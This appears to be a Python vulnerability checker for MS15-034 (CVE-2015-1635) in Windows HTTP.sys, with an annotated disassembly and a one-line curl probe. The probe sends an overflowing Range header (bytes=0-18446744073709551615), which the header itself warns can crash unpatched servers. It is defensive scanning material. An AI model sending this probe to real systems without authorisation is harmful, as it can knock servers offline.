Created
April 15, 2015 18:16
Checks a host for CVE-2015-1635 / MS15-034, the HTTP.sys range-header bug that Microsoft rates as remote code execution. Be aware that the probe request itself can blue-screen an unpatched Windows server and take it offline, so only run this against hosts you are authorised to test.
''' | |
___. .___ __ __ | |
\_ |__ ____ ___.__. ____ ____ __| _// |________ __ __ _______/ |_ | |
| __ \_/ __ < | |/ _ \ / \ / __ |\ __\_ __ \ | \/ ___/\ __\ | |
| \_\ \ ___/\___ ( <_> ) | \/ /_/ | | | | | \/ | /\___ \ | | | |
|___ /\___ > ____|\____/|___| /\____ | |__| |__| |____//____ > |__| | |
\/ \/\/ \/ \/ \/ | |
MS15-034 Checker | |
Danger! This script has not been properly qa'd and will probably fail in terrible ways. | |
It is based off a change in HTTP!UlpParseRange in which an error code is returned as a | |
result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of | |
an HTTP range request. | |
-BF | |
https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/ | |
Oneshot: | |
curl -v 10.0.1.1/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615" | |
8a8b2112 56 push esi | |
8a8b2113 6a00 push 0 | |
8a8b2115 2bc7 sub eax,edi | |
8a8b2117 6a01 push 1 | |
8a8b2119 1bca sbb ecx,edx | |
8a8b211b 51 push ecx | |
8a8b211c 50 push eax | |
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here | |
''' | |
import random
import socket
import sys
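# Target and probe definitions.  The original names are kept; the host and port
# can also be passed on the command line (see main()).  The code is written to
# run under both Python 2 and Python 3.
ipAddr = "10.0.1.1"
defaultPort = 80
# 2**64 - 1: the upper range bound that makes HTTP!RtlULongLongAdd fail inside
# the unpatched HTTP!UlpParseRange (see module docstring).
hexAllFfff = "18446744073709551615"
# Harmless first request, used only to see whether the target identifies as IIS.
req1 = "GET / HTTP/1.0\r\n\r\n"
# The actual probe.  "Connection: close" is added so a keep-alive server ends the
# response itself and we do not have to wait for the socket timeout to stop reading.
req = (
    "GET / HTTP/1.1\r\n"
    "Host: stuff\r\n"
    "Connection: close\r\n"
    "Range: bytes=0-" + hexAllFfff + "\r\n"
    "\r\n"
)

# Never hang on a host that is wedged -- or that the probe itself just crashed.
SOCKET_TIMEOUT = 10.0
# Upper bound on how much of a response is kept; the strings matched on live in
# the status line or the first few hundred bytes of the body.
MAX_RESPONSE = 64 * 1024

RESULT_VULN = "[!!] Looks VULN"
RESULT_PATCHED = "[*] Looks Patched"
RESULT_UNKNOWN = "[*] Unexpected response, cannot discern patch status"


def _exchange(host, port, request, timeout=SOCKET_TIMEOUT):
    """Send *request* to host:port and return the response as text.

    Reads until the server closes the connection, MAX_RESPONSE bytes have
    arrived, or a read times out (keep-alive server).  The socket is always
    closed, including when connect()/sendall() raise.

    Raises:
        socket.error: connection or send failure (socket.timeout on connect
            is a subclass and propagates too).
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    chunks = []
    received = 0
    try:
        sock.connect((host, port))
        sock.sendall(request.encode("latin-1"))
        while received < MAX_RESPONSE:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                # Server kept the connection open; classify what we have.
                break
            if not data:
                break
            chunks.append(data)
            received += len(data)
    finally:
        sock.close()
    # latin-1 never fails to decode, so binary junk cannot abort the check.
    return b"".join(chunks).decode("latin-1")


def looks_like_iis(response):
    """Return True if the first response mentions Microsoft anywhere.

    NOTE(review): this is a weak fingerprint -- a server that strips or
    rewrites its Server header is reported as "Not IIS" even if HTTP.sys is
    underneath, and a non-IIS server that mentions Microsoft in its body
    passes.  Kept as in the original; treat "Not IIS" as "not confirmed".
    """
    return "Microsoft" in response


def classify(response):
    """Map the response to the probe onto one of the RESULT_* verdicts.

    Unpatched HTTP.sys answers the overflowing Range with
    "Requested Range Not Satisfiable"; patched hosts reject the header with a
    400 whose body says "The request has an invalid header name".  Anything
    else is reported as undetermined rather than guessed.
    """
    if "Requested Range Not Satisfiable" in response:
        return RESULT_VULN
    # Original matched with a leading space; matching the sentence alone is the
    # same text with one fewer way to miss it.
    if "The request has an invalid header name" in response:
        return RESULT_PATCHED
    return RESULT_UNKNOWN


def main(argv=None):
    """Run the check.  Usage: script [host] [port]; defaults to ipAddr:80.

    Returns a process exit code: 0 for a completed check (including "Not
    IIS"), 1 if the target could not be reached, 2 on a bad port argument.
    """
    args = sys.argv[1:] if argv is None else list(argv)
    host = args[0] if args else ipAddr
    try:
        port = int(args[1]) if len(args) > 1 else defaultPort
    except ValueError:
        sys.stderr.write("usage: ms15-034 checker [host] [port]\n")
        return 2
    print("[*] Audit Started")
    try:
        if not looks_like_iis(_exchange(host, port, req1)):
            print("[*] Not IIS")
            return 0
        # Destructive-capable probe: see the module docstring before running.
        print(classify(_exchange(host, port, req)))
    except socket.error as exc:
        print("[!] Could not talk to %s:%d: %s" % (host, port, exc))
        return 1
    return 0


if __name__ == "__main__":
    sys.exit(main())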